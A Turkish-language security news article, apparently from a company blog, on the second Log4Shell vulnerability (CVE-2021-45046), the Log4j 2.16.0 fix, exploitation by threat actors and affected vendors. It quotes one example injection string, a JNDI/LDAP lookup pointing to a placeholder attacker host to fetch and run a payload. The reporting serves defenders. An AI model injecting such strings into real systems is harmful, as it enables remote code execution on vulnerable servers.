İkinci Log4Shell Güvenlik Açığı (CVE-2021-45046) Keşfedildi ve yeni yama yayınlandı.
Apache Software Foundation (ASF), yakın zamanda açıklanan Log4Shell istismarı için bir önceki yamanın “varsayılan olmayan bazı yapılandırmalarda eksik” olarak değerlendirilmesinin ardından Log4j günlük kaydı yardımcı programı için yeni bir düzeltme yayınladı.
CVE-2021-45046 olarak izlenen ikinci güvenlik açığı, CVSS derecelendirme sisteminde maksimum 10 üzerinden 3,7 olarak derecelendirilmiştir ve Log4j’nin 2.0-beta9’dan 2.12.1’e ve 2.13.0’dan 2.15.0’a kadar olan tüm sürümlerini etkiler. proje sahipleri, sistemlere sızmak ve sistemleri ele geçirmek için kötüye kullanılabilecek kritik bir uzaktan kod yürütme güvenlik açığını (CVE-2021-44228) ele almak için geçen hafta gönderdi.
ASF, yeni bir danışma belgesinde, CVE-2021-44228 için eksik olan yamanın “bir JNDI Arama modeli kullanarak bir hizmet reddi (DoS) saldırısıyla sonuçlanan kötü amaçlı girdi verileri oluşturmak” için kötüye kullanılabileceğini söyledi. Log4j’nin en son sürümü olan 2.16.0 (Java 8 veya sonraki bir sürümünü gerektiren kullanıcılar için), mesaj arama desteğini neredeyse tamamen kaldırır ve güvenlik açığının merkezinde yer alan bileşen olan JNDI’yi varsayılan olarak devre dışı bırakır. Java 7’ye ihtiyaç duyan kullanıcıların, kullanıma sunulduğunda Log4j 2.12.2 sürümüne yükseltmeleri önerilir.
ASF’den Ralph Goers, “CVE-2021-44228 ile uğraşmak JNDI’nin önemli güvenlik sorunları olduğunu gösterdi.” “Bildiklerimizi azaltmış olsak da, özellikle büyük çoğunluğun kullanma olasılığı düşük olduğundan, kullanıcıların varsayılan olarak tamamen devre dışı bırakması daha güvenli olacaktır.”dedi.
Java Adlandırma ve Dizin Arayüzü’nün kısaltması olan JNDI, programlama dilinde kodlanmış uygulamaların LDAP sunucuları gibi verileri ve kaynakları aramasını sağlayan bir Java API’sidir. Log4Shell, yaygın olarak Apache web sunucularına dahil edilen açık kaynaklı, Java tabanlı bir günlük kaydı çerçevesi olan Log4j kitaplığında bulunur.
Sorunun kendisi, LDAP bağlayıcısının JNDI bileşeni kötü amaçlı bir LDAP isteği enjekte etmek için kullanıldığında ortaya çıkar. "${jndi:ldap://attacker_controled_website/payload_to_be_executed}"
gibi bir şey bu, güvenlik açığı bulunan sürümü çalıştıran bir web sunucusunda oturum açıldığında kitaplığın, bir düşmanın uzak bir etki alanından bir yük almasına ve yerel olarak yürütmesine olanak tanır.
En son güncelleme, kusurdan kaynaklanan “gerçek bir siber pandemi” ile sonuçlandığından, birkaç tehdit aktörünün Log4Shell’i, madeni para madencileri, uzaktan erişim truva atları ve fidye yazılımları dahil olmak üzere daha fazla saldırı için zemin hazırlayacak şekilde ele geçirmesiyle sonuçlandı. makineler. Fırsatçı izinsiz girişlerin en azından 1 Aralık’tan beri başladığı söyleniyor, ancak hata 9 Aralık’ta yaygın bir bilgi haline geldi.
Güvenlik açığı, Java uygulamalarında neredeyse her yerde kullanılan bir günlük kaydı çerçevesinde mevcut olduğundan ve kötü aktörlere dünya çapında milyonlarca cihaza sızmak ve bunları tehlikeye atmak için benzeri görülmemiş bir ağ geçidi sunduğu için yaygın bir alarma yol açtı.
Kuruluşlar için daha fazla sorun yaratan, uzaktan kullanılabilir kusur aynı zamanda Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google gibi bir dizi şirkete ait yüzlerce büyük kurumsal ürünü de etkiliyor. IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler ve Zoho, önemli bir yazılım tedarik zinciri riski oluşturuyor.
İsrailli güvenlik şirketi Check Point, “Bir veya sınırlı sayıda yazılım içeren diğer büyük siber saldırıların aksine, Log4j temelde her Java tabanlı ürüne veya web hizmetine gömülüdür. Bunu manuel olarak düzeltmek çok zordur.” “Yamanın karmaşıklığı ve yararlanma kolaylığı nedeniyle bu güvenlik açığı, şirketler ve hizmetler bir koruma uygulayarak ürünlerine yönelik saldırıları önlemek için derhal harekete geçmedikçe, önümüzdeki yıllarda bizimle birlikte kalacak gibi görünüyor.”diye ekledi.
Hatanın açıklanmasından sonraki günlerde, en az on farklı grup, istismar çoğunluğuna atladı ve küresel olarak kurumsal ağların kabaca %44’ü saldırıya uğradı, bu da önemli bir tırmanışa işaret ediyor. ABD Siber Güvenlik ve Altyapı Güvenlik Ajansı (CISA) da Log4Shell’i Bilinen İstismar Edilen Güvenlik Açıkları Kataloğu’na ekleyerek federal kurumlara güvenlik açığı için yamaları dahil etmeleri için 24 Aralık’a kadar süre tanıdı.
Sophos’ta kıdemli bir tehdit araştırmacısı olan Sean Gallagher, “düşmanların daha sonra para kazanmak veya bundan faydalanmak amacıyla şu anda elde edebilecekleri her şeye erişme ihtimalinin yüksek olduğu” konusunda uyardı ve “önce bir durgunluk var” diye ekledi.
Gallagher, “Savunmacılar için en acil öncelik, altyapılarının tüm köşelerini yamalayarak ve hafifleterek maruz kalmayı azaltmak ve açıkta kalan ve potansiyel olarak güvenliği ihlal edilmiş sistemleri araştırmaktır. Bu güvenlik açığı her yerde olabilir,” diye ekledi.
Bu makale ilginizi çektiyse sizleri Log4Shell Güvenlik Açığı makalemize davet ediyoruz: https://www.ozztech.net/siber-guvenlik/log4shell-guvenlik-acigi/